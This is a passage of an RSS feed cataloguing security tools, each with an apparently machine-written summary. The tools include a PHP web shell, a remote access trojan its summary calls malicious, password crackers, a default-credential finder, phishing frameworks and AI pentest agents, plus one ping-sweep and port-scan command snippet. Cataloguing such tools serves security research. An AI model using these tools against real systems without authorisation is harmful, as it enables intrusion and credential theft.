&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The OSV.dev tool provides a platform for scanning software dependencies against a comprehensive database of known vulnerabilities. It features a Go-based scanner capable of analyzing various types of lockfiles, Docker containers, SBOMs, and git repositories, while enabling users to access a web UI and APIs for data integration and management. Notably, it includes tools for vulnerability data publishing, bisection, impact analysis, and leverages Google Cloud Platform for deployment and scalability.&lt;/p&gt;</description></item><item><title>OWASP-Web-Checklist</title><link>https://rainmana.github.io/hackyfeed/tools/0xradi-owasp-web-checklist/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xradi-owasp-web-checklist/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The OWASP Web Application Security Testing Checklist tool provides a comprehensive framework for evaluating the security posture of web applications through a series of structured assessments. Designed for security professionals, it covers multiple areas including information gathering, authentication, session management, and secure transmission, ensuring that all critical aspects of web application security are systematically addressed. Notable features include a user-friendly format available in both PDF and Docx, as well as a Trello board for effective task management and tracking.&lt;/p&gt;</description></item><item><title>p0wny-shell</title><link>https://rainmana.github.io/hackyfeed/tools/flozz-p0wny-shell/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/flozz-p0wny-shell/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; p0wny@shell is a minimalistic, single-file PHP shell designed for executing commands on servers during penetration testing of PHP applications. Its primary use case involves remote command execution, featuring capabilities such as command history navigation, file name auto-completion, file upload and download, and remote file system navigation. Notably, it poses security risks if misused, and users are cautioned against deploying it on servers without adequate understanding.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="p0wnyshell--single-file-php-shell"&gt;p0wny@shell:~# &amp;ndash; Single-file PHP Shell&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://discord.gg/P77sWhuSs4"&gt;&lt;img src="https://img.shields.io/badge/chat-Discord-8c9eff?logo=discord&amp;amp;logoColor=ffffff" alt="Discord"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>panda</title><link>https://rainmana.github.io/hackyfeed/tools/panda-re-panda/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/panda-re-panda/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PANDA is an open-source platform designed for architecture-neutral dynamic analysis, utilizing the QEMU whole system emulator to provide deep insights into code execution and data handling across various CPU architectures. It features capabilities for recording and replaying executions, allowing for compact and shareable replay logs, and supports a plugin architecture for enhanced code reusability in dynamic taint analysis and other complex analyses. The tool is developed in collaboration with academic institutions and is available as a Docker container as well as a Python interface for flexible integration into analysis workflows.&lt;/p&gt;</description></item><item><title>panopticon</title><link>https://rainmana.github.io/hackyfeed/tools/das-labor-panopticon/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/das-labor-panopticon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Panopticon is a cross-platform disassembler designed for reverse engineering, capable of disassembling multiple instruction sets including AMD64, x86, AVR, and MOS 6502, as well as opening ELF files. Notable features include a Qt-based GUI for visualizing and annotating control flow graphs, though it has been deprecated with a migration to GitLab and restructuring into multiple crates. Users are encouraged to transition to the new version, Verso, for continued development and support.&lt;/p&gt;</description></item><item><title>papermario</title><link>https://rainmana.github.io/hackyfeed/tools/pmret-papermario/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pmret-papermario/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Paper Mario is an ongoing decompilation project aimed at recreating the original Paper Mario video game for multiple regions including US, JP, PAL, and iQue. The tool generates corresponding ROMs, providing a clear progress tracking system for each version. Notable features include a dedicated setup guide, active community support via Discord, and a public website for monitoring development progress.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="paper-mario"&gt;Paper Mario&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://jenkins.deco.mp/job/papermario/job/main"&gt;&lt;img src="https://img.shields.io/jenkins/build?jobUrl=https%3A%2F%2Fjenkins.deco.mp%2Fjob%2Fpapermario%2Fjob%2Fmain" alt="Build Status"&gt;&lt;/a&gt;
&lt;a href="https://discord.gg/PgcMpQTzh5"&gt;&lt;img src="https://img.shields.io/discord/1141775228440158338?color=%237289DA&amp;amp;logo=discord&amp;amp;logoColor=ffffff" alt="Discord Channel"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This is a work-in-progress decompilation of Paper Mario.&lt;/p&gt;</description></item><item><title>paradoxiaRAT</title><link>https://rainmana.github.io/hackyfeed/tools/quantumcore-paradoxiarat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/quantumcore-paradoxiarat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Paradoxia is a Remote Access Tool (RAT) designed for covert control of target systems, featuring a user-friendly console that allows users to easily build and deploy client applications. Notable capabilities include multithreading for multiple session management, full file access, keylogging, microphone recording, and remote execution commands, alongside stealth operation and persistent installation. This tool is intended for malicious use, as indicated by its detection as malware by security software.&lt;/p&gt;</description></item><item><title>ParamSpider</title><link>https://rainmana.github.io/hackyfeed/tools/devanshbatham-paramspider/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/devanshbatham-paramspider/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ParamSpider is a tool designed for fetching and filtering URLs from Wayback Machine archives, specifically targeting domains for bug hunting, fuzzing, and further probing. Its notable features include the ability to ignore less relevant URLs, support for multiple domains, proxy configuration, and the option to introduce placeholders for parameter values, enhancing the efficiency of security assessments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;
 paramspider
 &lt;br&gt;
&lt;/h1&gt;
&lt;h4 align="center"&gt; Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing &lt;/h4&gt;
&lt;p align="center"&gt;
 &lt;a href="#about"&gt;📖 About&lt;/a&gt; •
 &lt;a href="#installation"&gt;🏗️ Installation&lt;/a&gt; •
 &lt;a href="#usage"&gt;⛏️ Usage&lt;/a&gt; •
 &lt;a href="#examples"&gt;🚀 Examples&lt;/a&gt; •
 &lt;a href="#contributing"&gt;🤝 Contributing&lt;/a&gt; •
&lt;/p&gt;</description></item><item><title>Passhunt</title><link>https://rainmana.github.io/hackyfeed/tools/viralmaniar-passhunt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/viralmaniar-passhunt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Passhunt is a tool designed to search for default credentials across network devices and web applications from a database of 523 vendors and 2084 default passwords. It facilitates quick access to these credentials through a simple command-line interface, allowing users to select vendors and retrieve associated default passwords efficiently. Notable features include the comprehensive vendor database and the ease of installation and usage with Python.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="passhunt"&gt;Passhunt&lt;/h1&gt;
&lt;p&gt;Passhunt is a simple tool for searching of default credentials for network devices, web applications and more. Search through 523 vendors and their 2084 default passwords.&lt;/p&gt;</description></item><item><title>passphrase-wordlist</title><link>https://rainmana.github.io/hackyfeed/tools/initstring-passphrase-wordlist/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/initstring-passphrase-wordlist/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &lt;code&gt;passphrase-wordlist&lt;/code&gt; project provides an extensive list of over 20 million phrases paired with two hashcat rule files tailored for GPU-based password cracking. Its primary use case is to enhance the effectiveness of hashcat&amp;rsquo;s cracking capabilities by generating numerous permutations of passphrases to exploit vulnerabilities in systems that utilize weak or common passwords. Notable features include a robust wordlist sourced from various databases and dynamic updates, along with customizable rule files that manipulate passphrase formatting for improved cracking success.&lt;/p&gt;</description></item><item><title>PasswordPusher</title><link>https://rainmana.github.io/hackyfeed/tools/pglombardo-passwordpusher/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pglombardo-passwordpusher/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Password Pusher is an open-source web application designed for securely sharing sensitive information such as passwords, notes, files, and URLs via self-destructing links. Its notable features include encrypted storage, customizable expiry controls, comprehensive audit logging, and the ability to self-host or utilize a hosted service, making it suitable for individual users and teams. The tool supports multiple languages and offers integrations through a JSON API and command-line interface, enhancing its versatility in secure information sharing.&lt;/p&gt;</description></item><item><title>patching</title><link>https://rainmana.github.io/hackyfeed/tools/gaasedelen-patching/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gaasedelen-patching/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Patching is a plugin for IDA Pro designed for interactive binary patching, aimed at enhancing the efficiency of malware analysis and software reverse engineering. It supports x86/x64 and Arm/Arm64 architectures, allowing users to edit assembly instructions in real-time, with visual feedback on the impact of their changes. Notable features include a context menu for quick patch actions, an intuitive assembly editing dialog, and the ability to NOP instructions or force conditional jumps swiftly.&lt;/p&gt;</description></item><item><title>pbtk</title><link>https://rainmana.github.io/hackyfeed/tools/marin-m-pbtk/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/marin-m-pbtk/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; pbtk is a Protobuf toolkit designed to aid in the reverse engineering of applications utilizing the Protobuf serialization format. It features a unified GUI that enables users to extract Protobuf data structures from various implementations, including Android and web applications, and provides capabilities for editing, replaying, and fuzzing Protobuf messages sent to network endpoints. Notable features include comprehensive support for multiple Java runtimes and binary formats, along with a user-friendly interface that streamlines the manipulation of Protobuf messages.&lt;/p&gt;</description></item><item><title>PDBRipper</title><link>https://rainmana.github.io/hackyfeed/tools/horsicq-pdbripper/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/horsicq-pdbripper/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PDBRipper is a utility designed for extracting information from PDB (Program Database) files, primarily used in software development and reverse engineering. Notable features include a graphical user interface and console mode for flexibility, as well as support for building on Windows using Visual Studio and Qt. The tool facilitates in-depth analysis and manipulation of debugging information contained within PDB files.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&amp;amp;hosted_button_id=NF3FBD3KHMXDN"&gt;&lt;img src="https://img.shields.io/badge/Donate-PayPal-green.svg" alt="Donate"&gt;&lt;/a&gt;
&lt;a href="https://github.com/horsicq/PDBRipper/releases"&gt;&lt;img src="https://img.shields.io/github/tag/horsicq/PDBRipper.svg" alt="GitHub tag (latest SemVer)"&gt;&lt;/a&gt;
&lt;a href="https://github.com/horsicq/PDBRipper/releases"&gt;&lt;img src="https://img.shields.io/github/downloads/horsicq/PDBRipper/total.svg" alt="GitHub All Releases"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h1 id="pdbripper"&gt;PDBRipper&lt;/h1&gt;
&lt;p&gt;PDBRipper is an utility for extract an information from PDB-files.&lt;/p&gt;</description></item><item><title>pdfrip</title><link>https://rainmana.github.io/hackyfeed/tools/mufeedvh-pdfrip/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mufeedvh-pdfrip/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PDFRip is a multithreaded PDF password cracking tool written in Rust, featuring advanced capabilities such as wordlist attacks, custom query builders, and structured password brute-forcing techniques. Notable features include prepared verifier hot paths for efficient password attempts, exact progress tracking, checkpointing for session resumption, and output in JSON format for automation. It supports various brute-force methods, including bounded masks, date, and number generators, making it a versatile utility for recovering PDF passwords.&lt;/p&gt;</description></item><item><title>pe-bear</title><link>https://rainmana.github.io/hackyfeed/tools/hasherezade-pe-bear/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hasherezade-pe-bear/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PE-bear is a multiplatform reversing tool designed for analyzing PE (Portable Executable) files, focusing on providing a quick and flexible initial inspection for malware analysts. It supports handling malformed PE files and comes equipped with an updated signature database from PEiD, enhancing its detection capabilities. Additionally, PE-bear can be easily installed on various platforms, including Windows and Linux, and is compatible with multiple package managers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h2 id="pe-bear"&gt;PE-bear&lt;/h2&gt;
&lt;img src="./logo/main_ico.png" alt="PE-bear logo" width=128&gt;
&lt;p&gt;&lt;a href="https://ci.appveyor.com/project/hasherezade/pe-bear"&gt;&lt;img src="https://ci.appveyor.com/api/projects/status/q2smuy32pqqo0oyn?svg=true" alt="Build status"&gt;&lt;/a&gt;
&lt;a href="https://app.codacy.com/gh/hasherezade/pe-bear/dashboard?utm_source=gh&amp;amp;utm_medium=referral&amp;amp;utm_content=&amp;amp;utm_campaign=Badge_grade"&gt;&lt;img src="https://app.codacy.com/project/badge/Grade/14648384b52b4d979bc1f2246edbd496" alt="Codacy Badge"&gt;&lt;/a&gt;
&lt;a href="https://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html"&gt;&lt;img src="https://img.shields.io/badge/License-GPL_v2-blue.svg" alt="License: GPL v2"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hasherezade/pe-bear/commits"&gt;&lt;img src="https://img.shields.io/github/last-commit/hasherezade/pe-bear/main" alt="Last Commit"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>pe-sieve</title><link>https://rainmana.github.io/hackyfeed/tools/hasherezade-pe-sieve/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hasherezade-pe-sieve/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PE-sieve is a lightweight malware detection tool that scans individual processes for malicious implants such as injected PEs, shellcodes, and various in-memory modifications. It effectively identifies techniques like Process Hollowing and Reflective DLL Injection, allowing for the extraction and analysis of detected threats. Additionally, PE-sieve can be integrated as a DLL with a simple API for use in other applications, enhancing its versatility in malware analysis workflows.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;img src="./logo/PE-SIEVE_small.png" alt=""&gt;
&lt;p&gt;&lt;a href="https://ci.appveyor.com/project/hasherezade/pe-sieve"&gt;&lt;img src="https://ci.appveyor.com/api/projects/status/crlo8iyvi4bm80yp?svg=true" alt="Build status"&gt;&lt;/a&gt;
&lt;a href="https://app.codacy.com/gh/hasherezade/pe-sieve/dashboard?branch=master"&gt;&lt;img src="https://api.codacy.com/project/badge/Grade/b75fd4d95bd94629879381241e4a7c02" alt="Codacy Badge"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hasherezade/pe-sieve/commits"&gt;&lt;img src="https://img.shields.io/github/commit-activity/m/hasherezade/pe-sieve" alt="Commit activity"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hasherezade/pe-sieve/commits"&gt;&lt;img src="https://img.shields.io/github/last-commit/hasherezade/pe-sieve/master" alt="Last Commit"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>penelope</title><link>https://rainmana.github.io/hackyfeed/tools/brightio-penelope/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/brightio-penelope/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Penelope is a modern shell handler designed to replace netcat for remote code execution (RCE) exploitation, focusing on enhancing post-exploitation workflows. It supports multiple listeners, session management, and dynamic interaction with target systems through modules, facilitating features such as file transfers, logging, and shell activity management. Built entirely in Python, it offers a standalone operation mode and compatibility across Unix-like systems, thereby streamlining the exploitation process for security professionals.&lt;/p&gt;</description></item><item><title>Penetration_Testing_POC</title><link>https://rainmana.github.io/hackyfeed/tools/mr-xn-penetration_testing_poc/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mr-xn-penetration_testing_poc/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Penetration_Testing_POC is a comprehensive collection of proof of concepts (POCs), scripts, tools, and articles related to penetration testing, intended to serve as a reference resource. It systematically categorizes vulnerabilities across various domains such as IoT, mobile devices, web applications, and privilege escalation methods, providing users with essential insights and practical exploitation techniques. Notable features include organized documentation and links to external resources, ensuring that users can easily navigate and leverage the provided information for security assessments.&lt;/p&gt;</description></item><item><title>penetration-testing-cheat-sheet</title><link>https://rainmana.github.io/hackyfeed/tools/ivan-sincek-penetration-testing-cheat-sheet/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ivan-sincek-penetration-testing-cheat-sheet/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Penetration Testing Cheat Sheet is a comprehensive checklist designed to assist cybersecurity professionals in performing penetration testing tasks. It aggregates various tools and techniques for phases such as reconnaissance, scanning, and vulnerability exploitation, while emphasizing the importance of complementarity among tools for better results. Noteworthy features include automation of certain tasks and links to crucial resources for penetration testing methodologies.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="penetration-testing-cheat-sheet"&gt;Penetration Testing Cheat Sheet&lt;/h1&gt;
&lt;p&gt;This is more of a checklist for myself. May contain useful tips and tricks.&lt;/p&gt;</description></item><item><title>Penetration-Testing-Tools</title><link>https://rainmana.github.io/hackyfeed/tools/mgeeky-penetration-testing-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mgeeky-penetration-testing-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Penetration Testing Tools repository is a comprehensive collection of over 160 scripts, utilities, and cheatsheets designed for Penetration Testing and IT security audits. It encompasses a wide range of categories including cloud assessments, network protocols, web security, and red teaming, enabling practitioners to increase efficiency and improve technical assurance in their engagements. Notable features include modular organization by function, a focus on real-world applicability, and the absence of sensitive client-specific information.&lt;/p&gt;</description></item><item><title>pentagi</title><link>https://rainmana.github.io/hackyfeed/tools/vxcontrol-pentagi/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vxcontrol-pentagi/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PentAGI is an AI-powered penetration testing framework that automates security assessments for information security professionals and researchers. Notable features include a fully autonomous AI agent capable of executing penetration test steps, integration with over 20 professional tools, a smart memory system for storing results, and comprehensive monitoring and reporting capabilities. The tool operates within a secure Docker environment and includes a modern web interface along with APIs for automation and integration, making it a flexible solution for advanced cybersecurity testing.&lt;/p&gt;</description></item><item><title>pentest</title><link>https://rainmana.github.io/hackyfeed/tools/jivoi-pentest/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jivoi-pentest/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;pentest&amp;rdquo; tool is designed for network reconnaissance and vulnerability assessment, facilitating tasks such as ping sweeping and port scanning across specified IP ranges. It offers automation scripts for performing comprehensive scans and generating organized results, making it an essential utility for penetration testers and security professionals. Key features include various scanning scripts that leverage target lists for efficient and systematic reconnaissance operations.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h2 id="so-you-want-to-be-a-rock-star"&gt;So, You Want to be a Rock Star?&lt;/h2&gt;
&lt;h2 id="follow-instructions-its-very-easy"&gt;Follow instructions, it`s very easy!&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ git clone https://github.com/jivoi/pentest.git ./offsecfw &lt;span style="color:#f92672"&gt;&amp;amp;&amp;amp;&lt;/span&gt; cd offsecfw
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ mix_ping_sweep.py 192.168.56.1-254 ./results
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ mix_port_scan.sh -t ./results/targets.txt -p all
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ mix_recon.py ./results/targets.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description></item><item><title>pentest-book</title><link>https://rainmana.github.io/hackyfeed/tools/six2dez-pentest-book/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/six2dez-pentest-book/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Pentest Book is a comprehensive resource for penetration testers, offering a collection of information, scripts, and methodologies gathered during various pentests. It serves as a practical guide for conducting recon, exploring vulnerabilities in web and cloud services, and utilizing tools like Burp Suite, complemented by cheat sheets and checklists. Key features include easy navigation, a searchable interface, and continuous updates to ensure relevance and accuracy in the fast-evolving cybersecurity landscape.&lt;/p&gt;</description></item><item><title>pentest-tools</title><link>https://rainmana.github.io/hackyfeed/tools/gwen001-pentest-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gwen001-pentest-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; pentest-tools is a collection of customizable security scripts designed for quick penetration testing needs, facilitating various tasks in security assessments. Notable features include domain enumeration, CORS vulnerability testing, subdomain extraction, and DNS requests handling, all provided in multiple programming languages such as Bash, Python, and PHP for versatile usability. This toolkit streamlines common pentesting workflows with efficient tools aimed at both novice and experienced security professionals.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;pentest-tools&lt;/h1&gt;
&lt;h4 align="center"&gt;A collection of custom security tools for quick needs.&lt;/h4&gt;
&lt;p align="center"&gt;
 &lt;img src="https://img.shields.io/badge/-bash-gray" alt="bash badge"&gt;
 &lt;img src="https://img.shields.io/badge/python-v3-blue" alt="python badge"&gt;
 &lt;img src="https://img.shields.io/badge/php-%3E=5.5-blue" alt="php badge"&gt;
 &lt;img src="https://img.shields.io/badge/license-MIT-green" alt="MIT license badge"&gt;
 &lt;a href="https://twitter.com/intent/tweet?text=https%3a%2f%2fgithub.com%2fgwen001%2fpentest-tools%2f" target="_blank"&gt;&lt;img src="https://img.shields.io/twitter/url?style=social&amp;url=https%3A%2F%2Fgithub.com%2Fgwen001%2Fpentest-tools" alt="twitter badge"&gt;&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Pentest-Windows</title><link>https://rainmana.github.io/hackyfeed/tools/arch3rpro-pentest-windows/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/arch3rpro-pentest-windows/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pentest-Windows11 v3.2 is a Windows penetration testing environment tailored for deployment on Mac M series chips and other platforms, integrating over 400 commonly used security tools and scripts. Notable features include support for multiple virtualization formats (VMware, Parallels Desktop, Hyper-V), optimized tool management, and a user-friendly interface, enabling efficient vulnerability assessment and penetration testing workflows. The environment is designed to be ready-to-use, allowing security professionals to conduct testing with minimal setup.&lt;/p&gt;</description></item><item><title>pentestagent</title><link>https://rainmana.github.io/hackyfeed/tools/gh05tcrew-pentestagent/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gh05tcrew-pentestagent/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PentestAgent is an AI-driven penetration testing tool designed to assist cybersecurity professionals in conducting thorough security assessments. It features multiple operational modes, including single-task assistance, autonomous task execution, and multi-agent orchestration, allowing users to adapt their approach based on project complexity. The tool supports integration with platforms like OpenAI and Anthropic, and can be run in Docker for enhanced isolation and access to a suite of pre-installed pentesting tools.&lt;/p&gt;</description></item><item><title>PentestTools</title><link>https://rainmana.github.io/hackyfeed/tools/arch3rpro-pentesttools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/arch3rpro-pentesttools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pentest Tools is a comprehensive catalog of penetration testing resources, referencing tools primarily from Kali Linux, and featuring both open-source and readily accessible software. It includes a wide array of categories such as information gathering, vulnerability analysis, and exploitation tools, aimed at facilitating various aspects of security assessments. Notable features include a curated list of essential tools, categorized functionalities, and a long-term commitment to updates and supplementary resources.&lt;/p&gt;</description></item><item><title>personal-security-checklist</title><link>https://rainmana.github.io/hackyfeed/tools/lissy93-personal-security-checklist/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lissy93-personal-security-checklist/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; 🔒 A compiled checklist of 300+ tips for protecting digital security and privacy in 2026&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;🔒 A compiled checklist of 300+ tips for protecting digital security and privacy in 2026&lt;/p&gt;</description></item><item><title>phishing_catcher</title><link>https://rainmana.github.io/hackyfeed/tools/x0rz-phishing_catcher/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/x0rz-phishing_catcher/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Phishing Catcher is a tool designed to identify potentially phishing domains in real-time by analyzing suspicious TLS certificate issuances reported to the Certificate Transparency Log via the CertStream API. It utilizes a configurable scoring system to evaluate domain names based on specific keywords and thresholds, allowing users to customize the sensitivity of detection. Notable features include a YAML configuration for adjustable scoring properties, support for both Python versions, and the ability to run in a Docker container for simplified deployment.&lt;/p&gt;</description></item><item><title>phishing-frenzy</title><link>https://rainmana.github.io/hackyfeed/tools/pentestgeek-phishing-frenzy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pentestgeek-phishing-frenzy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Phishing Frenzy is a Ruby on Rails-based framework designed for creating and managing phishing campaigns. Its primary use case is to facilitate penetration testing by simulating phishing attacks, allowing security professionals to assess and improve their organization&amp;rsquo;s defenses against such threats. Notable features include user-friendly documentation and tools for managing phishing emails and tracking user interactions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="phishing-frenzy"&gt;Phishing Frenzy&lt;/h1&gt;
&lt;p&gt;Ruby on Rails Phishing Framework&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i.imgur.com/pt4JHb4.png" alt="PhishingFrenzy"&gt;&lt;/p&gt;
&lt;h2 id="documentation--info"&gt;Documentation &amp;amp; Info&lt;/h2&gt;
